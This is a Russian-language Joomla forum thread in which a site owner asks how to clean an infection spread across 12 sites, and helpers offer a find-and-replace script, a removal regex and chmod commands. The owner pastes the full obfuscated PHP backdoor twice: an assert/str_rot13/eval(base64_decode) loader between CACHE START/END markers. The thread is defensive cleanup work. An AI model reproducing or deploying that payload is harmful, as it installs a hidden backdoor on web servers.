Форум русской поддержки Joomla!® CMS
10.12.2016, 22:33:00 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Как очистить сайт от вируса?

 (Прочитано 1607 раз)
0 Пользователей и 1 Гость смотрят эту тему.
V1RTUS
Осваиваюсь на форуме
***

Репутация: +1/-1
Offline Offline

Сообщений: 189


« : 08.06.2016, 19:16:01 »

У меня на хостинге в аккаунте 12 сайтов, все они разом заразились вирусником, все файлы index.php содержат вредоносный код, хостинг заблокировал отправку писем, над это срочно решать,  имею список зараженных файлов, но их там 700 штук, вручную очень долго, есть другой способ ?

Зараза вот такая
Код:
//###=CACHE START=###
error_reporting(0);
assert_options(ASSERT_ACTIVE, 1);
assert_options(ASSERT_WARNING, 0);
assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVzEyAGR2AGqyBGOyAzMyMQywLzSzLzSvLJRlLmx4AmOuVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVwRjBF4lZmLhBQRhZGNkVvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPWxMGHkAwH3MGxjMGMzMJD5L2WuMzWuLzSuZzZ5BQpjLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvNkZQxhZwZ2YwtkYwRjZIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwt1BTWuMQSuVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###

так же права на файл меняются, становятся доступны для  изменения всем
« Последнее редактирование: 08.06.2016, 19:22:48 от V1RTUS » Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #1 : 08.06.2016, 19:53:02 »

Скрипт для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace
Записан
V1RTUS
Осваиваюсь на форуме
***

Репутация: +1/-1
Offline Offline

Сообщений: 189


« Ответ #2 : 08.06.2016, 19:55:43 »

Скрипт для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace

Вы прям спаситель) а то уже думал как столько гигов качать, чтобы чистить.

Вопрос 2, как выставить нужные права теперь файлам Index.php, есть нечто подобное?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #3 : 08.06.2016, 20:20:14 »

в консоли find ./ -type f -name "index.php" -exec chmod 0444 {} \;
Записан
V1RTUS
Осваиваюсь на форуме
***

Репутация: +1/-1
Offline Offline

Сообщений: 189


« Ответ #4 : 08.06.2016, 20:50:01 »

Спасибо, последний вопрос с помощною скрипта весь текст найти не находит, отдельны слова получаются, там возможно искать с помощью масок, но так и не понял как(
помогите подготовить мой текст для запроса.
Записан
wishlight
Профи
********

Репутация: +201/-1
Online Online

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #5 : 08.06.2016, 22:56:02 »

Сперва сайты изолируйте от друг друга, если хостинг этого не предусмотрел. Чтобы из директории одного сайта нельзя было выполнить код в другом. А потом уже лечите.

Данный код только следствие заражения. Надо еще закрыть дыры и убрать бекдоры.
Записан
V1RTUS
Осваиваюсь на форуме
***

Репутация: +1/-1
Offline Offline

Сообщений: 189


« Ответ #6 : 08.06.2016, 23:02:10 »

Сперва сайты изолируйте от друг друга, если хостинг этого не предусмотрел. Чтобы из директории одного сайта нельзя было выполнить код в другом. А потом уже лечите.

Данный код только следствие заражения. Надо еще закрыть дыры и убрать бекдоры.
Как это делается? я был бы рад узнать, я про изоляцию сайтов друг от друга, если честно я года 2 назад у хостинга спрашивал, когда впервые вставлял второй сайт в один аккаунт, мне сказали типа зависимости нет.. а тут вон оно как оказалось(
Записан
wishlight
Профи
********

Репутация: +201/-1
Online Online

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #7 : 09.06.2016, 09:26:43 »

Это должен делать хостер. Но если вы согласились с его правилами, то он не виноват.
Записан
V1RTUS
Осваиваюсь на форуме
***

Репутация: +1/-1
Offline Offline

Сообщений: 189


« Ответ #8 : 10.06.2016, 02:39:45 »

Ребята помогите а

Поиск в FAR устроен как у обычного текстового редактора, есть поле Текст поиска и Текст замены, если отметить Искать по маске, то можно будет использовать регулярные выражения в поле Текст поиска, также появится чекбокс Учитывать регистр и кнопка Экранировать, если отметить Учитывать регистр то фразы php и pHp будут считаться не одним и тем же. Кнопка Экранировать поможет в построении маски, например, нужно найти все, что начинается на:
<iframe height="100" width="100" style="border: 0">
и заканчивается на:
</iframe>
чтоб не думать какие символы экранировать, просто нажмите кнопку, получится:
\<iframe height\="100" width\="100" style\="border\: 0"\>\<\/iframe\>
дальше добавьте метасимволы регулярного выражения, например:
\<iframe height\="100" width\="100" style\="border\: 0"\>.*?\<\/iframe\>
и начните поиск.


Моя задача найти этот кода, я жестко туплю, никак не выходит(

Код:
//###=CACHE START=###
error_reporting(0);
assert_options(ASSERT_ACTIVE, 1);
assert_options(ASSERT_WARNING, 0);
assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVzEyAGR2AGqyBGOyAzMyMQywLzSzLzSvLJRlLmx4AmOuVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVwRjBF4lZmLhBQRhZGNkVvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPWxMGHkAwH3MGxjMGMzMJD5L2WuMzWuLzSuZzZ5BQpjLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvNkZQxhZwZ2YwtkYwRjZIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwt1BTWuMQSuVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###

как должен выглядеть запрос? Прямой ввод искаемого текста не дает результатов, искать от и до я пытался, но видимо не верно пытался.
Записан
V1RTUS
Осваиваюсь на форуме
***

Репутация: +1/-1
Offline Offline

Сообщений: 189


« Ответ #9 : 12.06.2016, 02:02:27 »

РЕШЕНИЕ
используете скрипт  для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace

ПОИСК ДЛЯ ЗАПРОСА
\<\?php([\s]*)\/\/###\=CACHE START\=###.*?\/\/###\=CACHE END\=###([\s]*)\?\>

СТАВИТЕ НУЖНЫЕ ПРАВА
в консоли find ./ -type f -name "index.php" -exec chmod 0444 {} \;

Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet